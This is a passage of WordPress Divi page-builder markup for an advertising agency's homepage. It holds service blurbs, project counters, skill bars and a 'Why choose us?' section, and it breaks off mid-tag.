custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" alt=\"Why We\" title_text=\"Why-we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" title_text=\"800x800 w\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" title_text=\"800x800..1\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" title_text=\"800x800\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||92px|||\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" custom_margin=\"40px||59px|||\" custom_margin_tablet=\"||0px||false|false\" custom_margin_phone=\"3px||0px||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"30px||0px||false|false\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" padding_1_tablet=\"\" padding_1_phone=\"0px|||10%|false|false\" padding_1_last_edited=\"on|phone\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element 